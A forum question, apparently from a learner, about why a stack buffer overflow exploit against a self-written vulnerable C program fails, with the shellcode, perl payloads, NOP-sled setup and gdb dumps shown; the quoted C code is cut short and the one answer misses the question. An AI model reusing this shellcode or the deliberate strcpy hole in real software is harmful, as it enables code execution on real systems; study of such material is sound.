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Simple Buffer overflow Exploit with shellcode doesn't work

I made a c vulnerable C code and tried to exploit it but it doesn't seem to work even though I copied other examples. I apologize if I included lot of code.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void hello(char *name){
    char name_buffer[24];

    strcpy(name_buffer, name);
    printf("Hello %s\n", name_buffer);


int main(int argc, char **argv){
    return 0;

This is what it shows when I execute it

perl -e 'print "\x5a\xe9\xff\xff\xff\x7f\x00\x00" x 40' | ./a.out
Segmentation fault (core dumped)

The address in the input is the address of an environment variable SHELLCODE

cat shellcode
//shellcode is "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" printed and piped using perl

export SHELLCODE=$(perl -e 'print "\x90"x200')$(cat shellcode)

when I run the program in gdb:

run $(perl -e 'print "\x5a\xe9\xff\xff\xff\x7f\x01\x02" x 30')
// I added "\x01\x02" because if I just put \x00\x00 instead it won't get read due to bash ignoring null bytes. I did this so I can see that the SHELLCODE address is put is correctly put in place of the actual RIP
// break at line of strcpy(name_buffer, name);
i f
Stack level 0, frame at 0x7fffffffdcc0:
 rip = 0x555555554696 in hello (test.c:8); saved rip = 0x5555555546e6
 called by frame at 0x7fffffffdce0
 source language c.
 Arglist at 0x7fffffffdcb0, args: 
    name=0x7fffffffe117 "Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177Z\351\377\377\377\177", <incomplete sequence \351>...
 Locals at 0x7fffffffdcb0, Previous frame's sp is 0x7fffffffdcc0
 Saved registers:
  rbp at 0x7fffffffdcb0, rip at 0x7fffffffdcb8
(gdb) x/24xg name_buffer
0x7fffffffdc90: 0x0000000000000001  0x000055555555473d
0x7fffffffdca0: 0x00007ffff7de59a0  0x0000000000000000
0x7fffffffdcb0: 0x00007fffffffdcd0  0x00005555555546e6
0x7fffffffdcc0: 0x00007fffffffddb8  0x0000000200000000
0x7fffffffdcd0: 0x00005555555546f0  0x00007ffff7a05b97
0x7fffffffdce0: 0x0000000000000002  0x00007fffffffddb8
0x7fffffffdcf0: 0x0000000200008000  0x00005555555546c4
0x7fffffffdd00: 0x0000000000000000  0xb9bb56fbb5ab9e21
0x7fffffffdd10: 0x0000555555554580  0x00007fffffffddb0
0x7fffffffdd20: 0x0000000000000000  0x0000000000000000
0x7fffffffdd30: 0xecee03ae818b9e21  0xecee13118ed59e21
0x7fffffffdd40: 0x00007fff00000000  0x0000000000000000

As you see the return address is at 0x7fffffffdcb8 which is 0x00005555555546e6

Continuing, we can see that it is successfully overwritten in 0x7fffffffdcb8 to 0x02017fffffffe95a :

x/24xg name_buffer
0x7fffffffdc90: 0x02017fffffffe95a  0x02017fffffffe95a
0x7fffffffdca0: 0x02017fffffffe95a  0x02017fffffffe95a
0x7fffffffdcb0: 0x02017fffffffe95a  0x02017fffffffe95a
0x7fffffffdcc0: 0x02017fffffffe95a  0x02017fffffffe95a
0x7fffffffdcd0: 0x02017fffffffe95a  0x02017fffffffe95a
0x7fffffffdce0: 0x02017fffffffe95a  0x02017fffffffe95a
0x7fffffffdcf0: 0x02017fffffffe95a  0x02017fffffffe95a
0x7fffffffdd00: 0x02017fffffffe95a  0x02017fffffffe95a
0x7fffffffdd10: 0x02017fffffffe95a  0x02017fffffffe95a
0x7fffffffdd20: 0x02017fffffffe95a  0x02017fffffffe95a
0x7fffffffdd30: 0x02017fffffffe95a  0x02017fffffffe95a
0x7fffffffdd40: 0x02017fffffffe95a  0x02017fffffffe95a

I tried with an input repeating the address only once, twice and random values, but the error remains the same. I compiled the C code using:

gcc test.c -fno-stack-protector
//and also with
gcc test.c -fno-stack-protector -fno-mudflap

I doubt that the problem comes from the shellcode since I only copied it.

Edit: I get an error Program recieved signal SIGILL, Illegal instruction 0x0007fffffffffeaac in?? () Program recieved signal SIGILL, Illegal instruction 0x0007fffffffffeaac in?? () . I think this is because I removed suid from the program a.out , but when it has suid, I cant find the environment variable like I do when it doesn't has suid, it shows that all addresses are empty:

x/32s $rsp + 0x500      // where I normally find SHELLCODE variable
0x00007ffffdea4521: ""  // and the addresses are also very different than without suid

Your code is working perfectly fine.
Since you are using command line argument so you need to pass input string as well.
输出屏幕图像链接 This is how I complied.

gcc filename.c    

and this is how I executed.

./a.out AnkitMishra

This is what I got as Output:

Hello AnkitMishra

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